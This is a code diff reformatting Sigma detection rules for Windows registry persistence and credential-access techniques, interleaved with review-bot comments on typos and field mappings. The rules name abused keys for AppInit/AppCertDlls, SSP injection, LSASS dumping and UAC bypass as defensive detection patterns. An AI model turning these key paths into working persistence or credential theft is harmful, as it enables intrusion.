@@ -1,13 +1,9 @@
 title: New DLL Added to AppCertDlls Registry Key
 id: 6aa1d992-5925-4e9f-a49b-845e51d1de01
 status: test
-description: 'Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs
- value in the Registry key can be abused to obtain persistence and privilege escalation
-
- by causing a malicious DLL to be loaded and run in the context of separate processes
- on the computer.
-
- '
+description: |
+ Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation
+ by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
 references:
 - http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/
 - https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html
@@ -25,9 +21,9 @@ detection:
 EventID: 4657
 Channel: Security
 selection:
- - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Session
- Manager\AppCertDlls
- - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls
+ # Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one
+ - ObjectName: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls
+ - NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls
 condition: registry_event and selection
 fields:
 - ProcessName
diff --git a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
index 65ab8fd42..b782c7c60 100644
--- a/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
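Review bot: The `NewName` selector in the second AppCertDlls hunk keeps the pre-existing typo `CurentControlSet` (missing an `r`), so that branch of `selection` can never match a real key path and only the `ObjectName` branch is live; it should read `- NewName: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls`. The comment added just above describes what Sysmon reports, but this rule is keyed on `Channel: Security` / `EventID: 4657`, where `ObjectName` is the kernel path (`\REGISTRY\MACHINE\SYSTEM\...`); I have not verified whether 4657 shows `CurrentControlSet` or the concrete `ControlSet00X` name, so either confirm the exact path against a captured event or loosen the match to `- ObjectName|endswith: \Control\Session Manager\AppCertDlls`, which covers both. The first hunk on this line is a pure description reflow and raises nothing.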
+++ b/sigma/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml
@@ -1,9 +1,7 @@
 title: New DLL Added to AppInit_DLLs Registry Key
 id: 4f84b697-c9ed-4420-8ab5-e09af5b2345d
 status: test
-description: DLLs that are specified in the AppInit_DLLs value in the Registry key
- HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll
- into every process that loads user32.dll
+description: DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll
 references:
 - https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html
 author: Ilyas Ochkov, oscd.community, Tim Shelton
@@ -20,12 +18,12 @@ detection:
 EventID: 4657
 Channel: Security
 selection:
- - ObjectName|endswith:
- - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
- - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
- - NewName|endswith:
- - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
- - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
+ - ObjectName|endswith:
+ - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
+ - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
+ - NewName|endswith:
+ - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
+ - \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
 filter:
 NewValue: (Empty)
 condition: registry_event and (selection and not filter)
diff --git a/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml b/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml
index 61d7602fc..c1fd596de 100644
--- a/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_office_test_regadd.yml
@@ -1,8 +1,7 @@
 title: Office Application Startup - Office Test
 id: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c
 status: test
-description: Detects the addition of office test registry that allows a user to specify
- an arbitrary DLL that will be executed every time an Office application is started
+description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
 references:
 - https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/
 author: omkar72
diff --git a/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml b/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml
index 9b1cdfd6a..7d24e7959 100644
--- a/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml
@@ -1,11 +1,10 @@
 title: Windows Registry Trust Record Modification
 id: 295a59c1-7b79-4b47-a930-df12c15fc9c2
 related:
- - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
- type: similar
+ - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
+ type: similar
 status: test
-description: Alerts on trust record modification within the registry, indicating usage
- of macros
+description: Alerts on trust record modification within the registry, indicating usage of macros
 references:
 - https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/
 - http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html
diff --git a/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml b/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml
index 25516ed25..11bc3c188 100644
--- a/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml
@@ -21,9 +21,9 @@ detection:
 Channel: Security
 selection_create:
 NewName|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open
- OperationType: '%%1905'
+ OperationType: '%%1905'
 selection_set:
- OperationType: '%%1905'
+ OperationType: '%%1905'
 ObjectName|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\(Default)
 condition: registry_event and (1 of selection_*)
 falsepositives:
diff --git a/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml b/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml
index a4a75875f..fd73554f0 100644
--- a/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml
@@ -1,8 +1,7 @@
 title: PortProxy Registry Key
 id: a54f842a-3713-4b45-8c84-5f136fdebd3c
 status: test
-description: Detects the modification of PortProxy registry key which is used for
- port forwarding. For command execution see rule win_netsh_port_fwd.yml.
+description: Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.
 references:
 - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
 - https://adepts.of0x.cc/netsh-portproxy-code/
diff --git a/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml b/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml
index 99810a347..b2b5537f8 100644
--- a/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_runkey_winekey.yml
@@ -1,8 +1,7 @@
 title: WINEKEY Registry Modification
 id: b98968aa-dbc0-4a9c-ac35-108363cbf8d5
 status: test
-description: Detects potential malicious modification of run keys by winekey or team9
- backdoor
+description: Detects potential malicious modification of run keys by winekey or team9 backdoor
 references:
 - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
 author: omkar72
@@ -19,8 +18,7 @@ detection:
 EventID: 4657
 Channel: Security
 selection:
- ObjectName|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup
- Mgr
+ ObjectName|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr
 condition: registry_event and selection
 fields:
 - ProcessName
diff --git a/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml b/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml
index bed25173c..1e51e84e8 100644
--- a/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_runonce_persistence.yml
@@ -1,8 +1,7 @@
 title: Run Once Task Configuration in Registry
 id: c74d7efc-8826-45d9-b8bb-f04fac9e4eff
 status: test
-description: Rule to detect the configuration of Run Once registry key. Configured
- payload can be run by runonce.exe /AlternateShellStartup
+description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
 references:
 - https://twitter.com/pabraeken/status/990717080805789697
 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/
@@ -20,19 +19,16 @@ detection:
 EventID: 4657
 Channel: Security
 selection:
- ObjectName|startswith: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed
- Components
+ ObjectName|startswith: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
 ObjectName|endswith: \StubPath
 filter_chrome:
 NewValue|startswith: '"C:\Program Files\Google\Chrome\Application\'
- NewValue|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging
- --system-level
+ NewValue|contains: \Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
 filter_edge:
 NewValue|startswith:
 - '"C:\Program Files (x86)\Microsoft\Edge\Application\'
 - '"C:\Program Files\Microsoft\Edge\Application\'
- NewValue|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging
- --system-level --msedge --channel=stable
+ NewValue|endswith: \Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable
 condition: registry_event and (selection and not 1 of filter_*)
 falsepositives:
 - Legitimate modification of the registry key by legitimate program
diff --git a/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml b/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml
index 28d147641..0f527a317 100644
--- a/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml
@@ -1,9 +1,7 @@
 title: Shell Open Registry Keys Manipulation
 id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7
 status: test
-description: Detects the shell open key manipulation (exefile and ms-settings) used
- for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe,
- slui.exe via registry keys (e.g. UACMe 33 or 62)
+description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
 references:
 - https://github.com/hfiref0x/UACME
 - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
@@ -25,20 +23,19 @@ detection:
 EventID: 4657
 Channel: Security
 selection1:
- OperationType: '%%1905'
+ OperationType: '%%1905'
 ObjectName|endswith: Classes\ms-settings\shell\open\command\SymbolicLinkValue
 NewValue|contains: \Software\Classes\{
 selection2:
 ObjectName|endswith: Classes\ms-settings\shell\open\command\DelegateExecute
 selection3:
- OperationType: '%%1905'
+ OperationType: '%%1905'
 ObjectName|endswith:
 - Classes\ms-settings\shell\open\command\(Default)
 - Classes\exefile\shell\open\command\(Default)
 filter_sel3:
 NewValue: (Empty)
- condition: registry_event and (selection1 or selection2 or (selection3 and not
- filter_sel3))
+ condition: registry_event and (selection1 or selection2 or (selection3 and not filter_sel3))
 falsepositives:
 - Unknown
 level: high
diff --git a/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml
index 8731ad430..126da3863 100644
--- a/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml
@@ -1,11 +1,10 @@
 title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
 id: 55e29995-75e7-451a-bef0-6225e2f13597
 related:
- - id: 36803969-5421-41ec-b92f-8500f79c23b0
- type: similar
+ - id: 36803969-5421-41ec-b92f-8500f79c23b0
+ type: similar
 status: test
-description: Detects changes to the Registry in which a monitor program gets registered
- to dump the memory of the lsass.exe process
+description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
 references:
 - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
 - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
diff --git a/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml b/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml
index 913c7770d..fff1b666a 100644
--- a/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml
@@ -1,8 +1,7 @@
 title: Security Support Provider (SSP) Added to LSA Configuration
 id: eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc
 status: test
-description: Detects the addition of a SSP to the registry. Upon a reboot or API call,
- SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
+description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
 references:
 - https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/
 author: iwillkeepwatch
@@ -21,8 +20,7 @@ detection:
 selection_registry:
 ObjectName:
 - \REGISTRY\MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages
- - \REGISTRY\MACHINE\System\CurrentControlSet\Control\Lsa\OSConfig\Security
- Packages
+ - \REGISTRY\MACHINE\System\CurrentControlSet\Control\Lsa\OSConfig\Security Packages
 exclusion_images:
 ProcessName:
 - C:\Windows\system32\msiexec.exe
diff --git a/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml b/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml
index b4451d1b6..99517fc3e 100644
--- a/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml
@@ -1,9 +1,7 @@
 title: Sticky Key Like Backdoor Usage - Registry
 id: baca5663-583c-45f9-b5dc-ea96a22ce542
 status: test
-description: Detects the usage and installation of a backdoor that uses an option
- to register a malicious debugger for built-in tools that are accessible in the
- login screen
+description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
 references:
 - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/
 - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml b/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml
index 560f20432..047205340 100644
--- a/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml
@@ -1,8 +1,7 @@
 title: Atbroker Registry Change
 id: 9577edbb-851f-4243-8c91-1d5b50c1a39b
 status: test
-description: Detects creation/modification of Assistive Technology applications and
- persistence with usage of 'at'
+description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
 references:
 - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
 - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/
diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml b/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml
index 23424d31b..b5dd817ee 100644
--- a/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_susp_download_run_key.yml
@@ -1,8 +1,7 @@
 title: Suspicious Run Key from Download
 id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be
 status: test
-description: Detects the suspicious RUN keys created by software located in Download
- or temporary Outlook/Internet Explorer directories
+description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
 references:
 - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/
 author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml b/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml
index a70356ed6..b0bc78765 100644
--- a/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml
@@ -1,8 +1,7 @@
 title: DLL Load via LSASS
 id: b3503044-60ce-4bf4-bbcb-e3db98788823
 status: test
-description: Detects a method to load DLL via LSASS process using an undocumented
- Registry key
+description: Detects a method to load DLL via LSASS process using an undocumented Registry key
 references:
 - https://blog.xpnsec.com/exploring-mimikatz-part-1/
 - https://twitter.com/SBousseaden/status/1183745981189427200
diff --git a/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml b/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml
index 6cfff1bed..998cf4e99 100644
--- a/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml
+++ b/sigma/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml
@@ -1,8 +1,7 @@
 title: Suspicious Camera and Microphone Access
 id: 62120148-6b7a-42be-8b91-271c04e281a3
 status: test
-description: Detects Processes accessing the camera and microphone from suspicious
- folder
+description: Detects Processes accessing the camera and microphone from suspicious folder
 references:
 - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072
 author: Den Iuzvyk
@@ -37,7 +36,6 @@ detection:
 - :#Users#Desktop#
 condition: registry_event and (all of selection_*)
 falsepositives:
- - Unlikely, there could be conferencing software running from a Temp folder accessing
- the devices
+ - Unlikely, there could be conferencing software running from a Temp folder accessing the devices
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml b/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml
index 81c515e03..226b40a5d 100644
--- a/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml
+++ b/sigma/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml
@@ -1,8 +1,7 @@
 title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
 id: 4d431012-2ab5-4db7-a84e-b29809da2172
 status: experimental
-description: Detects enabling of the "AllowAnonymousCallback" registry value, which
- allows a remote connection between computers that do not have a trust relationship.
+description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
 references:
 - https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista
 author: X__Junior (Nextron Systems)
diff --git a/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml b/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml
index 8d2dc83c7..89d1acf36 100644
--- a/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml
@@ -1,8 +1,7 @@
 title: Registry Persistence via Service in Safe Mode
 id: 1547e27c-3974-43e2-a7d7-7f484fb928ec
 status: experimental
-description: Detects the modification of the registry to allow a driver or service
- to persist in Safe Mode.
+description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network
diff --git a/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml b/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml
index 34c7da23a..f4e2ec809 100644
--- a/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_add_port_monitor.yml
@@ -1,13 +1,9 @@
 title: Add Port Monitor Persistence in Registry
 id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e
 status: experimental
-description: 'Adversaries may use port monitors to run an attacker supplied DLL during
- system boot for persistence or privilege escalation.
-
- A port monitor can be set through the AddMonitor API call to set a DLL to be loaded
- at startup.
-
- '
+description: |
+ Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
+ A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md
 author: frack113
@@ -28,10 +24,9 @@ detection:
 NewValue|endswith: .dll
 filter_cutepdf:
 ProcessName: C:\Windows\System32\spoolsv.exe
- ObjectName|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF
- Writer Monitor v4.0\Driver
+ ObjectName|contains: \System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver
 NewValue: cpwmon64_v40.dll
- SubjectUserName|contains:
+ SubjectUserName|contains: # covers many language settings
 - AUTHORI
 - AUTORI
 filter_leg1:
diff --git a/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml
index ac5ad54db..7b950b37c 100644
--- a/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_aedebug_persistence.yml
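Review bot: In the second port-monitor hunk, `filter_cutepdf` keys on `SubjectUserName|contains:` with the values `AUTHORI` / `AUTORI`, but on Security-channel registry events the account name and the authority are separate fields (SubjectUserName carries e.g. `SYSTEM`, SubjectDomainName carries `NT AUTHORITY`), so this reads like a Sysmon `User` filter carried over unchanged and the exclusion may never match. The EventID is not in this hunk, so this assumes the rule reads 4657 like the other builtin registry rules in the commit; if that holds, the line should become `SubjectDomainName|contains: # covers many language settings` with the same two values, and the new comment should say which field it is qualifying. Worth confirming against a captured CutePDF install event before changing it.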
@@ -1,9 +1,7 @@
 title: Add Debugger Entry To AeDebug For Persistence
 id: 092af964-4233-4373-b4ba-d86ea2890288
 status: experimental
-description: Detects when an attacker adds a new "Debugger" value to the "AeDebug"
- key in order to achieve persistence which will get invoked when an application
- crashes
+description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
 references:
 - https://persistence-info.github.io/Data/aedebug.html
 - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging
@@ -26,7 +24,6 @@ detection:
 NewValue: '"C:\WINDOWS\system32\vsjitdebugger.exe" -p %ld -e %ld -j 0x%p'
 condition: registry_set and (selection and not filter)
 falsepositives:
- - Legitimate use of the key to setup a debugger. Which is often the case on developers
- machines
+ - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml b/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml
index 5305a02b8..901cfae25 100644
--- a/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml
@@ -1,8 +1,7 @@
 title: Allow RDP Remote Assistance Feature
 id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b
 status: experimental
-description: Detect enable rdp feature to allow specific user to rdp connect on the
- targeted machine
+description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
 author: frack113
diff --git a/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml b/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml
index 326b7a50d..da5690ee0 100644
--- a/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml
@@ -1,11 +1,7 @@
 title: Potential AMSI COM Server Hijacking
 id: 160d2780-31f7-4922-8b3a-efce30e63e96
 status: experimental
-description: Detects changes to the AMSI come server registry key in order disable
- AMSI scanning functionalities. When AMSI attempts to starts its COM component,
- it will query its registered CLSID and return a non-existent COM server. This
- causes a load failure and prevents any scanning methods from being accessed, ultimately
- rendering AMSI useless
+description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
 references:
 - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
 - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml
index 09cb1c34f..f2a6af771 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml
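Review bot: The reflowed AMSI description carries three wording errors into the new single line: `come server` should be `COM server`, `in order disable` should be `in order to disable`, and `attempts to starts` should be `attempts to start`. Since the sentence is now one line it can be fixed in one edit: `description: Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionalities. When AMSI attempts to start its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless`. Nothing else in the hunk changes meaning.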
@@ -1,16 +1,15 @@
 title: Classes Autorun Keys Modification
 id: 9df5f547-c86a-433e-b533-f2794357e242
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: experimental
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
@@ -59,8 +58,7 @@ fields:
 - OldValueType
 - NewValueType
 falsepositives:
- - Legitimate software automatically (mostly, during installation) sets up autorun
- keys for legitimate reason
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
 - Legitimate administrator sets up autorun keys for legitimate reason
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml
index 032e80d5a..ff0eaa529 100644
--- a/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml
+++ b/sigma/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml
@@ -1,17 +1,16 @@
 title: Common Autorun Keys Modification
 id: f59c3faf-50f3-464b-9f4c-1b67ab512d99
 related:
- - id: 17f878b8-9968-4578-b814-c4217fc5768c
- type: obsoletes
+ - id: 17f878b8-9968-4578-b814-c4217fc5768c
+ type: obsoletes
 status: experimental
 description: Detects modification of autostart extensibility point (ASEP) in registry.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d
- - https://persistence-info.github.io/Data/userinitmprlogonscript.html
-author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin,
- oscd.community, Tim Shelton, frack113 (split), wagga (name)
+ - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
+ - https://persistence-info.github.io/Data/userinitmprlogonscript.html # UserInitMprLogonScript
+author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
 date: 2019/10/25
 modified: 2023/08/17
 tags:
